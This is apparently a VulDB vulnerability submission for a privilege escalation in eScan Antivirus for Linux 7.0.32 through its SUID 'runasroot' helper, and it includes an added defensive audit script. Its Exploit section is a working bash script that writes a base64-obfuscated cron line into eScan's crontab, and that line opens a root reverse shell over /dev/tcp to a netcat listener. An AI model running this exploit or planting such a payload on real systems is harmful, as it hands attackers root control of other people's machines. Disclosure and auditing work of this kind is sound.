| Title | Incorrect UID check leads to privilege escalation (eScan antivirus Linux version 7.0.32) |
|---|
| Description | # Description
eScan Antivirus for Linux version 7.0.32 ships a SUID binary, `runasroot`. The program has a logic bug in the check that decides whether the calling user may execute a `chmod` command as root, allowing an attacker to edit eScan's cron job, inject a malicious command and gain control of the system as root.
# Root cause
`runasroot` performs a check to verify that the current user is privileged before it runs `chmod` as root on the user's behalf. An incorrect operator in that check allows any user to run the `chmod` commands that `runasroot` crafts (screenshot: https://user-images.githubusercontent.com/29118926/248438900-a591be40-57de-4e67-a94b-cbdb086386ca.png). eScan's `runasroot` permits permission changes on a set of files, including the cron job files (screenshot: https://user-images.githubusercontent.com/29118926/248438420-6f8bec35-d3d8-4b8c-b0b1-d91df403a356.png).
By default, eScan antivirus writes two crontabs to the system after installation (screenshot: https://user-images.githubusercontent.com/29118926/248438463-2e6f878b-6023-4dfd-8611-0e46117370a2.png).
An attacker can exploit this logic to change the permissions of an existing crontab, inject malicious code that runs as root, and gain full control of the system.
# Exploit
```bash
#!/bin/bash
# Modify permission of crontab
/opt/MicroWorld/sbin/runasroot chmod 777 /opt/MicroWorld/etc/mwavupdate
# Modify crontab to run malicious command
echo "KiAqICogKiAqIHJvb3QgYmFzaCAtYyAnZXhlYyBiYXNoIC1pICY+L2Rldi90Y3AvMTI3LjAuMC4xLzg4ODggPCYxJwo=" | base64 -d > /opt/MicroWorld/etc/mwavupdate
/opt/MicroWorld/sbin/runasroot chmod 750 /opt/MicroWorld/etc/mwavupdate
nc -nvlp 8888
``` |
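The chain above depends on two observable conditions: the `runasroot` helper being setuid, and a cron file under eScan's control being left writable by other users after the permission change. The following POSIX sh audit script is an added example and not part of the original submission or of eScan's own tooling; the two paths it checks are taken from the submission, while the `world_writable` and `is_setuid` helper names and the extra-path argument handling are assumptions for illustration. It reports cron files that others can write to and notes a setuid helper, so a defender can confirm the patched state or spot tampering.

```shell
#!/bin/sh
# Added audit example (not eScan's code): flags the conditions that the
# submission's privilege-escalation chain relies on. Paths come from the
# submission; the helper names are assumptions for this illustration.

# Return 0 if "others" hold write permission on the path, 1 otherwise.
# Uses the POSIX ls -l mode string (column 9 is the other-write bit), so it
# does not depend on GNU stat.
world_writable() {
    [ -e "$1" ] || return 1
    perm=$(ls -ld "$1" | cut -c9)
    [ "$perm" = "w" ]
}

# Return 0 if the setuid bit is set on the path, 1 otherwise.
# Column 4 of the mode string is 's' (setuid + exec) or 'S' (setuid only).
is_setuid() {
    [ -e "$1" ] || return 1
    bit=$(ls -ld "$1" | cut -c4)
    [ "$bit" = "s" ] || [ "$bit" = "S" ]
}

# Audit the eScan helper and cron file named in the submission, plus any
# extra cron paths passed as arguments. Returns 1 if a writable cron file
# is found, 0 otherwise.
audit_escan() {
    rc=0
    helper=/opt/MicroWorld/sbin/runasroot
    if is_setuid "$helper"; then
        echo "NOTE: $helper is setuid; confirm it is a build with the fixed UID check"
    fi
    for f in /opt/MicroWorld/etc/mwavupdate "$@"; do
        if world_writable "$f"; then
            echo "ALERT: $f is world-writable; cron content can be altered by any local user"
            rc=1
        fi
    done
    return $rc
}

# Run the audit when executed directly; extra cron paths may follow.
audit_escan "$@"
```

On a patched host the script should print nothing and exit 0; an `ALERT` line means a root-executed cron file is open to modification and should be reset to a non-world-writable mode (the submission's own exploit leaves it at 750 after tampering, so a clean mode alone is not proof of integrity and the file content should be reviewed as well).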
|---|
| Source | https://gist.github.com/dmknght/ac489cf3605ded09b3925521afee3003 |
|---|
| User | dmknght (UID 51830) |
|---|
| Submission | 07/31/2023 08:35 (3 years ago) |
|---|
| Moderation | 08/16/2023 15:06 (16 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 237315 [MicroWorld eScan Anti-Virus 7.0.32 on Linux runasroot incorrect execution-assigned permissions] |
|---|
| Points | 20 |
|---|